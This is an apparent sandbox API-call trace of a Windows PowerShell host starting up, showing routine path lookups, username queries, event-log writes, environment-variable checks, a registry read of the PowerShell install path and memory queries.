	[0295.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0296.717] CoTaskMemAlloc (cb=0x804) returned 0x1b919480
	[0296.717] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b919480, nSize=0x12d6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d6e8) returned 0x1
	[0296.717] CoTaskMemFree (pv=0x1b919480) 
	[0296.717] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0296.717] GetUserNameW (in: lpBuffer=0x314ad0, pcbBuffer=0x12d728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d728) returned 1
	[0296.718] CoTaskMemFree (pv=0x314ad0) 
	[0296.718] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea8198*="Registry", lpRawData=0x2ea7f28) returned 1
	[0297.357] CoTaskMemAlloc (cb=0x804) returned 0x1b919480
	[0297.357] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b919480, nSize=0x12d6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d6e8) returned 0x1
	[0297.357] CoTaskMemFree (pv=0x1b919480) 
	[0297.357] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0297.358] GetUserNameW (in: lpBuffer=0x314ad0, pcbBuffer=0x12d728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d728) returned 1
	[0297.358] CoTaskMemFree (pv=0x314ad0) 
	[0297.358] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ead5b0*="Variable", lpRawData=0x2ead340) returned 1
	[0297.360] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0297.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.360] CoTaskMemFree (pv=0x389830) 
	[0297.361] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0297.361] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.361] CoTaskMemFree (pv=0x389830) 
	[0297.384] CoTaskMemAlloc (cb=0x804) returned 0x1b919480
	[0297.384] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b919480, nSize=0x12d6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d6e8) returned 0x1
	[0297.385] CoTaskMemFree (pv=0x1b919480) 
	[0297.385] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0297.385] GetUserNameW (in: lpBuffer=0x314ad0, pcbBuffer=0x12d728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d728) returned 1
	[0297.385] CoTaskMemFree (pv=0x314ad0) 
	[0297.385] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ec11c8*="Certificate", lpRawData=0x2ec0f58) returned 1
	[0297.388] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0297.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.388] CoTaskMemFree (pv=0x389830) 
	[0297.389] GetLogicalDrives () returned 0x4
	[0297.390] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0297.390] CoTaskMemAlloc (cb=0x20e) returned 0x3641d0
	[0297.390] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3641d0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0297.390] CoTaskMemFree (pv=0x3641d0) 
	[0297.391] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0297.391] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.391] CoTaskMemFree (pv=0x389830) 
	[0297.392] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0297.392] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.392] CoTaskMemFree (pv=0x389830) 
	[0298.152] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.152] CoTaskMemFree (pv=0x389830) 
	[0298.153] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.154] CoTaskMemFree (pv=0x389830) 
	[0298.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0298.154] SetErrorMode (uMode=0x1) returned 0x1
	[0298.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d330 | out: lpFileInformation=0x12d330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0298.154] SetErrorMode (uMode=0x1) returned 0x1
	[0298.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0298.155] SetErrorMode (uMode=0x1) returned 0x1
	[0298.155] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d330 | out: lpFileInformation=0x12d330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0298.155] SetErrorMode (uMode=0x1) returned 0x1
	[0298.155] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.155] CoTaskMemFree (pv=0x389830) 
	[0298.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0298.158] SetErrorMode (uMode=0x1) returned 0x1
	[0298.158] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d2f0 | out: lpFileInformation=0x12d2f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0298.158] SetErrorMode (uMode=0x1) returned 0x1
	[0298.158] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0298.159] SetErrorMode (uMode=0x1) returned 0x1
	[0298.159] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d2f0 | out: lpFileInformation=0x12d2f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0298.159] SetErrorMode (uMode=0x1) returned 0x1
	[0298.159] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0298.159] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0298.159] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0298.159] SetErrorMode (uMode=0x1) returned 0x1
	[0298.159] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d2f0 | out: lpFileInformation=0x12d2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0298.160] SetErrorMode (uMode=0x1) returned 0x1
	[0298.160] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0298.160] SetErrorMode (uMode=0x1) returned 0x1
	[0298.160] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d2f0 | out: lpFileInformation=0x12d2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0298.160] SetErrorMode (uMode=0x1) returned 0x1
	[0298.160] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0298.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0298.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0298.160] SetErrorMode (uMode=0x1) returned 0x1
	[0298.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d2f0 | out: lpFileInformation=0x12d2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0298.161] SetErrorMode (uMode=0x1) returned 0x1
	[0298.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0298.161] SetErrorMode (uMode=0x1) returned 0x1
	[0298.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d2f0 | out: lpFileInformation=0x12d2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0298.161] SetErrorMode (uMode=0x1) returned 0x1
	[0298.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0298.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0298.162] SetErrorMode (uMode=0x1) returned 0x1
	[0298.162] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d330 | out: lpFileInformation=0x12d330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0298.162] SetErrorMode (uMode=0x1) returned 0x1
	[0298.162] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0298.162] SetErrorMode (uMode=0x1) returned 0x1
	[0298.162] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d330 | out: lpFileInformation=0x12d330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0298.162] SetErrorMode (uMode=0x1) returned 0x1
	[0298.162] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0298.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0298.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0298.163] SetErrorMode (uMode=0x1) returned 0x1
	[0298.163] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d330 | out: lpFileInformation=0x12d330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0298.163] SetErrorMode (uMode=0x1) returned 0x1
	[0298.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0298.163] SetErrorMode (uMode=0x1) returned 0x1
	[0298.163] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d330 | out: lpFileInformation=0x12d330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0298.164] SetErrorMode (uMode=0x1) returned 0x1
	[0298.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0298.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0298.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0298.165] SetErrorMode (uMode=0x1) returned 0x1
	[0298.165] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d5f0 | out: lpFileInformation=0x12d5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0298.165] SetErrorMode (uMode=0x1) returned 0x1
	[0298.177] CoTaskMemAlloc (cb=0x804) returned 0x1b919480
	[0298.177] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b919480, nSize=0x12d958 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d958) returned 0x1
	[0298.177] CoTaskMemFree (pv=0x1b919480) 
	[0298.177] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0298.177] GetUserNameW (in: lpBuffer=0x314ad0, pcbBuffer=0x12d998 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d998) returned 1
	[0298.178] CoTaskMemFree (pv=0x314ad0) 
	[0298.178] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ef9eb0*="Available", lpRawData=0x2ef9c40) returned 1
	[0298.899] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.899] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.900] CoTaskMemFree (pv=0x389830) 
	[0298.900] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.900] CoTaskMemFree (pv=0x389830) 
	[0298.902] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.902] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0298.902] CoTaskMemFree (pv=0x389830) 
	[0298.902] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.902] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0298.902] CoTaskMemFree (pv=0x389830) 
	[0298.904] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d978 | out: phkResult=0x12d978*=0x38c) returned 0x0
	[0298.904] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d8fc, lpData=0x0, lpcbData=0x12d8f8*=0x0 | out: lpType=0x12d8fc*=0x1, lpData=0x0, lpcbData=0x12d8f8*=0x56) returned 0x0
	[0298.904] CoTaskMemAlloc (cb=0x5a) returned 0x1b904820
	[0298.904] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d8cc, lpData=0x1b904820, lpcbData=0x12d8c8*=0x56 | out: lpType=0x12d8cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d8c8*=0x56) returned 0x0
	[0298.904] CoTaskMemFree (pv=0x1b904820) 
	[0298.904] RegCloseKey (hKey=0x38c) returned 0x0
	[0298.905] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.905] CoTaskMemFree (pv=0x389830) 
	[0298.936] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.936] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.936] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.936] CoTaskMemFree (pv=0x389830) 
	[0298.938] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.941] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.941] CoTaskMemFree (pv=0x389830) 
	[0298.942] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.942] CoTaskMemFree (pv=0x389830) 
	[0298.942] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.942] CoTaskMemFree (pv=0x389830) 
	[0298.943] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.943] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.943] CoTaskMemFree (pv=0x389830) 
	[0298.944] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.945] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.945] CoTaskMemFree (pv=0x389830) 
	[0298.945] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0298.945] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.945] CoTaskMemFree (pv=0x389830) 
	[0299.710] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.711] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.739] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.228] CoTaskMemAlloc (cb=0x104) returned 0x389830
	[0300.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389830, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.228] CoTaskMemFree (pv=0x389830) 
	[0303.253] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.255] VirtualQuery (in: lpAddress=0x12b9d0, lpBuffer=0x12c890, dwLength=0x30 | out: lpBuffer=0x12c890*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.255] VirtualQuery (in: lpAddress=0x12a420, lpBuffer=0x12b2e0, dwLength=0x30 | out: lpBuffer=0x12b2e0*(BaseAddress=0x12a000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
